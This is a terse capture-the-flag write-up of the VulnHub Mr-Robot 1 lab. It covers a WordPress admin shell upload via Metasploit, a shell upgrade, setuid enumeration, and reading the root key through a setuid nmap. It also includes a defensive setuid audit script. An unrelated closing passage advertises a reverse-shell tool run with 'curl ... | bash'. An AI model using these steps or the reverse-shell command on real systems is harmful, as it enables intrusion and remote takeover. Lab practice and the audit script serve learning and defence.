Mr-Robot 1 (VulnHub)

https://www.vulnhub.com/entry/mr-robot-1,151/
---
https://192.168.1.240/robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt
---
https://192.168.1.240/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
---
cat fsocity.dic | sort | uniq -c | sort -hr | tail -15
     75 002
     75 001
     75 000080
     75 000000
     75 000
      1 uHack
      1 psychedelic
      1 imhack
      1 iamalearn
      1 ER28-0652
      1 c3fcd3d76192e4007dfb496cca67e13b (another key?)
      1 ABCDEFGHIJKLMNOPQRSTUVWXYZ
      1 abcdefghijklmnopq
      1 abcdEfghijklmnop
      1 abcdefghijklmno
---
http://192.168.1.240/wp-login.php

elliot
ER28-0652
---
use exploit/unix/webapp/wp_admin_shell_upload

python -c 'import pty;pty.spawn("/bin/bash")'
su robot (Google md5 value)
---
robot@linux:~$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root  root  4.0K Nov 13  2015 .
drwxr-xr-x 3 root  root  4.0K Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
---
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f95
---
find / -perm +6000 -type f -ls 2>/dev/null
 15068   44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
 15093   68 -rwsr-xr-x   1 root     root        69120 Feb 12  2015 /bin/umount
 15060   96 -rwsr-xr-x   1 root     root        94792 Feb 12  2015 /bin/mount
 15069   44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /bin/ping6
 15085   40 -rwsr-xr-x   1 root     root        36936 Feb 17  2014 /bin/su
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-touchlock
 36231   48 -rwsr-xr-x   1 root     root        47032 Feb 17  2014 /usr/bin/passwd
 36216   32 -rwsr-xr-x   1 root     root        32464 Feb 17  2014 /usr/bin/newgrp
 36298  412 -rwxr-sr-x   1 root     utmp       421768 Nov  7  2013 /usr/bin/screen
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-unlock
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-lock
 36041   44 -rwsr-xr-x   1 root     root        41336 Feb 17  2014 /usr/bin/chsh
 36056   36 -rwxr-sr-x   1 root     crontab     35984 Feb  9  2013 /usr/bin/crontab
 36038   48 -rwsr-xr-x   1 root     root        46424 Feb 17  2014 /usr/bin/chfn
 36034   56 -rwxr-sr-x   1 root     shadow      54968 Feb 17  2014 /usr/bin/chage
 36148   68 -rwsr-xr-x   1 root     root        68152 Feb 17  2014 /usr/bin/gpasswd
 36112   24 -rwxr-sr-x   1 root     shadow      23360 Feb 17  2014 /usr/bin/expiry
 36080   16 -rwxr-sr-x   1 root     mail        14856 Dec  7  2013 /usr/bin/dotlockfile
 36349  152 -rwsr-xr-x   1 root     root       155008 Mar 12  2015 /usr/bin/sudo
 36337  280 -rwxr-sr-x   1 root     ssh        284784 May 12  2014 /usr/bin/ssh-agent
 36388   20 -rwxr-sr-x   1 root     tty         19024 Feb 12  2015 /usr/bin/wall
 34835  496 -rwsr-xr-x   1 root     root       504736 Nov 13  2015 /usr/local/bin/nmap
...
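Added example, not part of the original writeup: a defender-side audit of a `find / -perm +6000 -type f -ls` listing like the one above, flagging setuid/setgid files that sit outside distro-managed paths (the setuid /usr/local/bin/nmap is exactly that case) or that are missing from an assumed baseline. The baseline set and the suspect prefixes are assumptions for this example; the sample lines are copied from the listing above.

```python
import re
from collections import namedtuple

# Assumed baseline of setuid/setgid helpers a stock Ubuntu-14.04-era box ships;
# in real use build it from the package manager or a known-good image.
BASELINE = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su", "/usr/bin/passwd",
    "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/sudo",
    "/usr/bin/crontab", "/usr/bin/chage", "/usr/bin/expiry", "/usr/bin/wall",
    "/usr/bin/ssh-agent", "/usr/bin/screen", "/usr/bin/mail-lock", "/usr/bin/mail-unlock",
    "/usr/bin/mail-touchlock", "/usr/bin/dotlockfile",
}
# A privileged bit under these prefixes is flagged regardless of the baseline (assumption).
SUSPECT_PREFIXES = ("/usr/local/", "/opt/", "/tmp/", "/var/tmp/", "/home/", "/dev/shm/")

# find -ls fields: inode blocks mode links owner group size month day year|time path
LS_LINE = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<mode>\S{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\w{3}\s+\d+\s+\S+\s+(?P<path>/\S+)"
)
Finding = namedtuple("Finding", "path owner mode setuid setgid reason")

def audit(listing):
    # Return one Finding per setuid/setgid file that is mislocated or off-baseline.
    findings = []
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue  # skips the '...' truncation marker and any other non -ls lines
        mode, path = m["mode"], m["path"]
        setuid, setgid = mode[3] in "sS", mode[6] in "sS"  # 's' in the owner/group x slot
        if path.startswith(SUSPECT_PREFIXES):
            reason = "privileged bit on a file outside distro-managed paths"
        elif path not in BASELINE:
            reason = "not in the setuid/setgid baseline"
        else:
            continue
        findings.append(Finding(path, m["owner"], mode, setuid, setgid, reason))
    return findings

# Constructed sample: four lines taken from the listing above plus the '...' marker.
SAMPLE = """\
 15068   44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
 36349  152 -rwsr-xr-x   1 root     root       155008 Mar 12  2015 /usr/bin/sudo
 36298  412 -rwxr-sr-x   1 root     utmp       421768 Nov  7  2013 /usr/bin/screen
 34835  496 -rwsr-xr-x   1 root     root       504736 Nov 13  2015 /usr/local/bin/nmap
...
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f.mode} {f.owner:<8} {f.path}: {f.reason}")
```

Feeding it the full output of the find command turns the manual eyeballing above into a repeatable check that a host-integrity job can run and alert on.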
---
robot@linux:~$ nmap -iL /root/key-3-of-3.txt localhost
nmap -iL /root/key-3-of-3.txt localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2016-09-11 11:25 UTC
Failed to resolve given hostname/IP: 04787ddef27c3dee1ee161b21670b4e4.
Note that you can't use '/mask' AND '[1-4,7,100-]' style IP ranges
WARNING: No targets were specified, so 0 hosts scanned.
Nmap finished: 0 IP addresses (0 hosts up) scanned in 0.314 seconds
robot@linux:~$

alm.fm

I have created a tool which will try and establish a reverse shell to a nominated IP address and port using the following binaries (in order).

  1. bash
  2. nc
  3. ruby
  4. php
  5. python
To use this tool run the following on the target host:
curl https://alm.fm/<your-ip>/<your-port> | bash

On your machine make sure you have something like this running:
nc -l -p <your-port>
This should save you some time on engagements where you have a web shell or similar. It's worth noting that the target will attempt to make an outbound TCP connection, which may be picked up.

Be aware that curl XXXX | bash is seen as bad practice these days (when was it ever a good idea?), but in this case it's convenient. You can grab the PHP code here.